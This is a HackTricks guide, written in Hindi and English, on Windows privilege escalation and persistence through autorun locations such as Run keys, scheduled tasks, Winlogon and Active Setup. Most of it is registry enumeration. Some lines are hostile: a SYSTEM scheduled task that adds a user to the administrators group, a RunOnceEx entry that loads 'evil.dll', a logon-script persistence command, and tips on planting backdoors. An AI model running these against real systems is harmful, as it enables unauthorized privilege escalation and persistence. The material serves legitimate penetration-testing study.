Autoruns के साथ Privilege Escalation

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें

• subscription plans देखें!
• जुड़ें 💬 Discord group, telegram group, follow करें @hacktricks_live X/Twitter पर, या LinkedIn page और YouTube channel देखें।
• HackTricks](https://github.com/carlospolop/hacktricks) और HackTricks Cloud github repos में PRs सबमिट करके hacking tricks साझा करें।

WMIC

Wmic का उपयोग startup पर programs चलाने के लिए किया जा सकता है। देखें कि कौन-से binaries startup पर run होने के लिए programmed हैं:

wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl

Scheduled Tasks

Tasks को certain frequency के साथ run करने के लिए schedule किया जा सकता है। देखें कौन-से binaries run करने के लिए scheduled हैं:

schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"

फोल्डर्स

Startup folders में स्थित सभी binaries startup पर execute होंगी। सामान्य startup folders वे हैं जो आगे सूचीबद्ध हैं, लेकिन startup folder registry में indicated होता है. Read this to learn where.

dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"

FYI: Archive extraction path traversal vulnerabilities (such as the one abused in WinRAR prior to 7.13 – CVE-2025-8088) can be leveraged to deposit payloads directly inside these Startup folders during decompression, resulting in code execution on the next user logon. For a deep-dive into this technique see:

Archive Extraction Path Traversal

Registry

Tip

Note from here: The Wow6432Node registry entry indicates that you are running a 64-bit Windows version. The operating system uses this key to display a separate view of HKEY_LOCAL_MACHINE\SOFTWARE for 32-bit applications that run on 64-bit Windows versions.

Runs

Commonly known AutoRun registry:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
• HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
• HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx

Registry keys known as Run and RunOnce are designed to automatically execute programs every time a user logs into the system. The command line assigned as a key’s data value is limited to 260 characters or less.

Service runs (can control automatic startup of services during boot):

• HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
• HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices

RunOnceEx:

• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
• HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx

Windows Vista और बाद के संस्करणों में, Run और RunOnce registry keys अपने-आप generate नहीं होतीं। इन keys की entries या तो programs को सीधे start कर सकती हैं या उन्हें dependencies के रूप में specify कर सकती हैं। उदाहरण के लिए, logon पर किसी DLL file को load करने के लिए RunOnceEx registry key के साथ “Depend” key का उपयोग किया जा सकता है। यह system start-up के दौरान “C:\temp\evil.dll” execute करने के लिए registry entry जोड़कर दिखाया गया है:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"

Tip

Exploit 1: यदि आप HKLM के अंदर बताए गए किसी भी registry में लिख सकते हैं, तो जब कोई अलग user log in करेगा, आप privileges escalate कर सकते हैं।

Tip

Exploit 2: यदि आप HKLM के अंदर किसी भी registry में बताए गए binaries को overwrite कर सकते हैं, तो जब कोई अलग user log in करेगा, आप उस binary को backdoor के साथ modify करके privileges escalate कर सकते हैं।

#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices

reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx

#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'

Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'

Startup Path

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Startup folder में रखे गए shortcuts user logon या system reboot के दौरान services या applications को automatically launch कर देंगे। Startup folder का location registry में Local Machine और Current User दोनों scopes के लिए defined होता है। इसका मतलब है कि इन specified Startup locations में जो भी shortcut add किया जाएगा, वह logon या reboot process के बाद linked service या program को start कराएगा, जिससे programs को automatically run करने के लिए schedule करने का यह एक straightforward method बन जाता है।

Tip

अगर आप HKLM के under किसी भी [User] Shell Folder को overwrite कर सकते हैं, तो आप उसे अपने control वाले folder की ओर point कर सकते हैं और एक backdoor रख सकते हैं जो system में user के login करते ही execute हो जाएगा, जिससे privileges escalate हो जाएंगे।

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"

Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"

UserInitMprLogonScript

• HKCU\Environment\UserInitMprLogonScript

यह per-user registry value किसी script या command की ओर इशारा कर सकती है जिसे उस user के log on करने पर execute किया जाता है। यह मुख्यतः एक persistence primitive है क्योंकि यह केवल प्रभावित user के context में चलता है, लेकिन post-exploitation और autoruns reviews के दौरान इसे फिर भी check करना worth है।

Tip

यदि आप current user के लिए इस value को write कर सकते हैं, तो आप admin rights के बिना अगले interactive logon पर execution को re-trigger कर सकते हैं। यदि आप इसे किसी दूसरे user hive के लिए write कर सकते हैं, तो उस user के log on करने पर आपको code execution मिल सकती है।

reg query "HKCU\Environment" /v "UserInitMprLogonScript"
reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "C:\Users\Public\logon.bat" /f
reg delete "HKCU\Environment" /v "UserInitMprLogonScript" /f

Get-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"
Set-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript" -Value 'C:\Users\Public\logon.bat'
Remove-ItemProperty -Path 'Registry::HKCU\Environment' -Name "UserInitMprLogonScript"

Notes:

• .bat, .cmd, .ps1, या अन्य launcher files के लिए full paths को प्राथमिकता दें जो target user द्वारा पहले से readable हों।
• यह logoff/reboot के बाद भी बना रहता है जब तक value remove नहीं की जाती।
• HKLM\...\Run के विपरीत, यह अपने आप elevation नहीं देता; यह user-scope persistence है।

Winlogon Keys

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

आमतौर पर, Userinit key को userinit.exe पर set किया जाता है। हालांकि, अगर इस key को modify किया जाता है, तो specified executable भी user logon के समय Winlogon द्वारा launch किया जाएगा। इसी तरह, Shell key का उद्देश्य explorer.exe को point करना है, जो Windows के लिए default shell है।

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"

Tip

यदि आप registry value या binary को overwrite कर सकते हैं, तो आप privileges escalate करने में सक्षम होंगे।

Policy Settings

• HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
• HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Run key की जाँच करें।

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"

AlternateShell

Safe Mode Command Prompt बदलना

Windows Registry में HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot के अंदर, एक AlternateShell value डिफ़ॉल्ट रूप से cmd.exe पर set होती है। इसका मतलब है कि जब आप startup के दौरान “Safe Mode with Command Prompt” चुनते हैं (F8 दबाकर), तो cmd.exe इस्तेमाल होता है। लेकिन, अपने computer को इस mode में automatically start कराने के लिए, F8 दबाने और manually चुनने की जरूरत नहीं होती।

“Safe Mode with Command Prompt” में automatically start होने के लिए boot option बनाने के steps:

1. boot.ini file के attributes बदलें ताकि read-only, system, और hidden flags हट जाएँ: attrib c:\boot.ini -r -s -h
2. Editing के लिए boot.ini खोलें।
3. इस तरह की एक line insert करें: multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)
4. boot.ini में changes save करें।
5. Original file attributes फिर से apply करें: attrib c:\boot.ini +r +s +h

• Exploit 1: AlternateShell registry key बदलने से custom command shell setup किया जा सकता है, जिससे unauthorized access संभव है।
• Exploit 2 (PATH Write Permissions): system PATH variable के किसी भी हिस्से में write permissions होना, खासकर C:\Windows\system32 से पहले, आपको custom cmd.exe execute करने देता है, जो system Safe Mode में start होने पर backdoor हो सकता है।
• Exploit 3 (PATH and boot.ini Write Permissions): boot.ini में write access automatic Safe Mode startup enable करता है, जिससे अगले reboot पर unauthorized access आसान हो जाता है।

Current AlternateShell setting check करने के लिए, इन commands का use करें:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'

Installed Component

Active Setup Windows में एक feature है जो desktop environment के पूरी तरह load होने से पहले शुरू होता है। यह कुछ commands के execution को प्राथमिकता देता है, जिन्हें user logon आगे बढ़ने से पहले पूरा होना चाहिए। यह process अन्य startup entries, जैसे Run या RunOnce registry sections, के trigger होने से भी पहले होती है।

Active Setup को निम्न registry keys के माध्यम से manage किया जाता है:

• HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
• HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
• HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components
• HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components

इन keys के भीतर विभिन्न subkeys होते हैं, जिनमें से प्रत्येक एक specific component से संबंधित होता है। विशेष रूप से महत्वपूर्ण key values में शामिल हैं:

• IsInstalled:
• 0 दर्शाता है कि component का command execute नहीं होगा।
• 1 का मतलब है कि command हर user के लिए एक बार execute होगा, और यदि IsInstalled value missing हो तो यही default behavior होता है।
• StubPath: Active Setup द्वारा execute किए जाने वाले command को define करता है। यह कोई भी valid command line हो सकती है, जैसे notepad launch करना।

Security Insights:

• जिस key में IsInstalled "1" पर set है और एक specific StubPath है, उसमें modify या write करने से unauthorized command execution हो सकती है, जिससे privilege escalation संभव है।
• किसी भी StubPath value द्वारा referenced binary file को बदलने से भी, पर्याप्त permissions होने पर, privilege escalation हासिल की जा सकती है।

StubPath configurations को सभी Active Setup components में inspect करने के लिए, इन commands का उपयोग किया जा सकता है:

reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath

Browser Helper Objects

Overview of Browser Helper Objects (BHOs)

Browser Helper Objects (BHOs) DLL modules हैं जो Microsoft की Internet Explorer में अतिरिक्त सुविधाएँ जोड़ते हैं। ये हर start पर Internet Explorer और Windows Explorer में load होते हैं। हालांकि, इनका execution NoExplorer key को 1 set करके block किया जा सकता है, जिससे ये Windows Explorer instances के साथ load नहीं होते।

BHOs Windows 10 पर Internet Explorer 11 के जरिए compatible हैं, लेकिन Microsoft Edge में supported नहीं हैं, जो Windows के नए versions का default browser है।

System में registered BHOs देखने के लिए, आप निम्न registry keys inspect कर सकते हैं:

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
• HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

हर BHO registry में अपने CLSID द्वारा represented होता है, जो एक unique identifier के रूप में काम करता है। हर CLSID की detailed information HKLM\SOFTWARE\Classes\CLSID\{<CLSID>} के अंतर्गत मिल सकती है।

Registry में BHOs query करने के लिए, इन commands का उपयोग किया जा सकता है:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s

Internet Explorer Extensions

• HKLM\Software\Microsoft\Internet Explorer\Extensions
• HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions

ध्यान दें कि registry में हर dll के लिए 1 नया registry होगा और उसे CLSID द्वारा दर्शाया जाएगा। आप CLSID की जानकारी HKLM\SOFTWARE\Classes\CLSID\{<CLSID>} में पा सकते हैं

Font Drivers

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers
• HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'

Open Command

• HKLM\SOFTWARE\Classes\htmlfile\shell\open\command
• HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command

reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""

इमेज फ़ाइल एक्ज़िक्यूशन ऑप्शंस

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options

SysInternals

ध्यान दें कि autoruns मिलने वाली सभी sites को winpeas.exe पहले ही search कर चुका होता है। हालांकि, auto-executed files की अधिक comprehensive list के लिए आप systinternals से autoruns का उपयोग कर सकते हैं:

autorunsc.exe -m -nobanner -a * -ct /accepteula

अधिक

Autoruns जैसे और registries खोजें https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2

संदर्भ

• https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref
• https://attack.mitre.org/techniques/T1547/001/
• https://attack.mitre.org/techniques/T1037/001/
• https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
• https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell
• https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-03-2026

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें

• subscription plans देखें!
• जुड़ें 💬 Discord group, telegram group, follow करें @hacktricks_live X/Twitter पर, या LinkedIn page और YouTube channel देखें।
• HackTricks](https://github.com/carlospolop/hacktricks) और HackTricks Cloud github repos में PRs सबमिट करके hacking tricks साझा करें।